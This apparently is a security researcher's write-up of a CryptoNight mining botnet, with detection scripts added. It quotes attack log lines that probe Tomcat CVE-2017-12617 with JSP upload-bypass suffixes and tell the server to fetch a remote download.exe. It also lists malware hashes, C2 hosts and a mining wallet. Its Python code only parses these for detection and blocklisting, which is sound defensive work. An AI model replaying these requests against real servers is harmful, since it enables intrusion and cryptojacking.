CryptoNight mining botnet | Joachim De Zutter
January 2019

Log entries:
117.50.10.51 - - [16/Jan/2019:07:51:28 +0200] "PUT /FxCodeShell.jsp%20 HTTP/1.1" 405 237 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
117.50.10.51 - - [16/Jan/2019:07:51:28 +0200] "PUT /FxCodeShell.jsp::$DATA HTTP/1.1" 405 243 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
117.50.10.51 - - [16/Jan/2019:07:51:28 +0200] "PUT /FxCodeShell.jsp/ HTTP/1.1" 405 237 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
117.50.10.51 - - [16/Jan/2019:07:51:29 +0200] "GET /FxCodeShell.jsp?wiew=FxxkMyLie1836710Aa&os=1&address=http://a46.bulehero.in/download.exe HTTP/1.1" 404 213 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"

Snort alert:
01/16-07:51:28.798636  [**] [1:2024808:4] ET WEB_SPECIFIC_APPS Apache Tomcat Possible CVE-2017-12617 JSP Upload Bypass Attempt [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 117.50.10.51:60453 -> #.#.#.#:80
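The four request lines above show the typical CVE-2017-12617 probing sequence: the same JSP path is PUT three times with a different suffix each time (a trailing `/`, an encoded space `%20`, and the NTFS `::$DATA` stream), then a GET passes a download URL in the query string. The 405 responses mean Tomcat refused the PUT, so this is an attempt, not a successful upload. The following Python script, an added example and not part of the original post, reproduces that detection over the page's own log lines (the lines are embedded as a constructed sample, with the User-Agent shortened); it flags PUT/POST requests whose target only becomes a `.jsp` path after one of those suffixes is removed, and extracts any `address=http...` download URL so it can be fed to a blocklist. The field names and the `BYPASS_SUFFIXES` list are this example's own choices.

```python
import re
from urllib.parse import parse_qs

# Constructed sample: the request lines quoted on the page, User-Agent shortened.
SAMPLE_LOG = r'''
117.50.10.51 - - [16/Jan/2019:07:51:28 +0200] "PUT /FxCodeShell.jsp%20 HTTP/1.1" 405 237 "-" "Mozilla/5.0"
117.50.10.51 - - [16/Jan/2019:07:51:28 +0200] "PUT /FxCodeShell.jsp::$DATA HTTP/1.1" 405 243 "-" "Mozilla/5.0"
117.50.10.51 - - [16/Jan/2019:07:51:28 +0200] "PUT /FxCodeShell.jsp/ HTTP/1.1" 405 237 "-" "Mozilla/5.0"
117.50.10.51 - - [16/Jan/2019:07:51:29 +0200] "GET /FxCodeShell.jsp?wiew=FxxkMyLie1836710Aa&os=1&address=http://a46.bulehero.in/download.exe HTTP/1.1" 404 213 "-" "Mozilla/5.0"
'''

# Apache/nginx combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Suffixes seen in the page's log that turn "x.jsp" into a path the servlet
# mapping does not treat as a JSP while the filesystem still stores x.jsp.
BYPASS_SUFFIXES = ("/", "%20", "::$DATA")


def parse_line(line):
    """Return the matched fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def strip_bypass_suffix(path):
    """Remove trailing bypass suffixes; return (normalised_path, was_altered)."""
    stripped = path
    changed = True
    while changed:
        changed = False
        for suffix in BYPASS_SUFFIXES:
            if stripped.endswith(suffix) and len(stripped) > len(suffix):
                stripped = stripped[: -len(suffix)]
                changed = True
    return stripped, stripped != path


def analyze(log_text):
    """Scan log text and return a list of finding dicts (one per suspicious line)."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path, _, query = rec["target"].partition("?")
        if rec["method"] in ("PUT", "POST"):
            base, altered = strip_bypass_suffix(path)
            if altered and base.lower().endswith(".jsp"):
                findings.append({
                    "type": "jsp_upload_bypass",
                    "ip": rec["ip"],
                    "raw_target": rec["target"],
                    "normalised": base,
                    # 405 = Method Not Allowed: the PUT was refused by the server.
                    "status": int(rec["status"]),
                })
        elif rec["method"] == "GET" and query:
            url = parse_qs(query).get("address", [""])[0]
            if url.startswith(("http://", "https://")):
                findings.append({
                    "type": "download_url",
                    "ip": rec["ip"],
                    "url": url,
                    "status": int(rec["status"]),
                })
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f)
```

Because `strip_bypass_suffix` loops until nothing more can be removed, a target such as `/x.jsp/::$DATA` is also normalised back to `/x.jsp`, which is one step further than the exact sequence in the page's log.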

Downloader:
File name: download.exe
File size: 322560
MD5: 12c09f34160a80cbe3f9f405a27ded4d
SHA1: 6d928168e8ed7ae3d4766877c4b99fe03a6711ab
SHA256: a16243c45805e2b249babf3115915730c7b91b378f6a6795fac08436c0e75943
SSDeep: 6144:WIw4eq0/4hF0sPNJIf3kvpmI/y4Dk+figYigExVsc29FhC6Gh:Wq0wh5MUQ4Dk+figpPxie62
File is UPX compressed.
VirusTotal report
Hybrid Analysis report

Miner:
File name: docropool.exe / mscteui.exe / unloadcur.exe
File size: 3769344
MD5: 36968503f54dad1165a47ee5dec357ff
SHA1: 0f007a09c859cf1c0eef85b55068b9770e0adb2a
SHA256: 100b49c780ac60366ff07517b96d4b090f3a420d24d5200b9252c5e0eab38380
SSDeep: 98304:hNguFpgSHhKafJo569O80DSRQK7Mxr4uYeV+R/bGlicUw3YIkaDR3AuVgc3Uv1:hNc06U7RQ9xaeVITP43Xkw3Pe
File is UPX compressed.
VirusTotal report
Hybrid Analysis report

Configuration:
File name: Cfg.ini
File size: 410
MD5: 9f4584b7f16596f1658a89fb4b6254ec
SHA1: dcd6adc031396231157482351104615b8bec6f98
SHA256: e1a3af59b3cdb38c53bbdc99db5819d07cc41c884cff2aebbe7d3ad4e7263244
Configuration file contents:
[UpdateNode]
Us=a47.bulehero.in
Kr=a48.bulehero.in
[MainUpdate]
MainVersion=20190114
MainExeName=docropool
MainSize=3769344
[Infect]
DownUrl=http://a46.bulehero.in/download.exe
[MinIng]
MineUpdate=Off
variant=--variant=-1
Address=4AN9zC5PGgQWtg1mTNZDySHSS79nG1qd4FWA1rVjEGZV84R8BqoLN9wU1UCnmvu1rj89bjY4Fat1XgEiKks6FoeiRi1EHhh
MiningPool=pool.bulehero.in:7777
Algorithm=cryptonight
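The configuration above is plain INI and already holds every network indicator of this botnet: the two update nodes, the download host and the mining pool, plus the Monero wallet and the size the updater expects the miner binary to have (3769344, matching the miner listed above). The Python below is an added example, not a tool from the post, that parses a constructed copy of Cfg.ini with the standard `configparser` module and collects those indicators into one structure for blocklisting and triage; `extract_indicators` and `size_matches_config` are this example's own helper names.

```python
import configparser
from urllib.parse import urlsplit

# Constructed copy of the Cfg.ini contents quoted on the page.
CFG_INI = """[UpdateNode]
Us=a47.bulehero.in
Kr=a48.bulehero.in
[MainUpdate]
MainVersion=20190114
MainExeName=docropool
MainSize=3769344
[Infect]
DownUrl=http://a46.bulehero.in/download.exe
[MinIng]
MineUpdate=Off
variant=--variant=-1
Address=4AN9zC5PGgQWtg1mTNZDySHSS79nG1qd4FWA1rVjEGZV84R8BqoLN9wU1UCnmvu1rj89bjY4Fat1XgEiKks6FoeiRi1EHhh
MiningPool=pool.bulehero.in:7777
Algorithm=cryptonight
"""


def load_config(text):
    """Parse INI text; keep key case and disable % interpolation (values are raw)."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.optionxform = str  # keep "DownUrl" rather than lowercasing to "downurl"
    cfg.read_string(text)
    return cfg


def extract_indicators(cfg):
    """Collect hosts, download URL, pool, wallet and expected miner size."""
    hosts = set()
    for key in ("Us", "Kr"):
        hosts.add(cfg["UpdateNode"][key])
    download_url = cfg["Infect"]["DownUrl"]
    hosts.add(urlsplit(download_url).hostname)
    # rpartition tolerates IPv6-style "host:port" as well as a bare host.
    pool_host, _, pool_port = cfg["MinIng"]["MiningPool"].rpartition(":")
    hosts.add(pool_host)
    return {
        "hosts": sorted(hosts),
        "download_url": download_url,
        "pool": (pool_host, int(pool_port)),
        "wallet": cfg["MinIng"]["Address"],
        "algorithm": cfg["MinIng"]["Algorithm"],
        "miner_name": cfg["MainUpdate"]["MainExeName"],
        "expected_miner_size": int(cfg["MainUpdate"]["MainSize"]),
        "version": cfg["MainUpdate"]["MainVersion"],
    }


def size_matches_config(cfg, observed_size):
    """True if a recovered binary has the size the updater expects (triage check)."""
    return observed_size == int(cfg["MainUpdate"]["MainSize"])


if __name__ == "__main__":
    ind = extract_indicators(load_config(CFG_INI))
    for key, value in ind.items():
        print(f"{key}: {value}")
```

The hosts list is what would go into DNS or proxy blocking, while the wallet address and pool are the values to search for in other samples when linking them to the same operator.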
Multiple Cryptocurrency Miner Botnets Start to Exploit the New ThinkPHP Vulnerability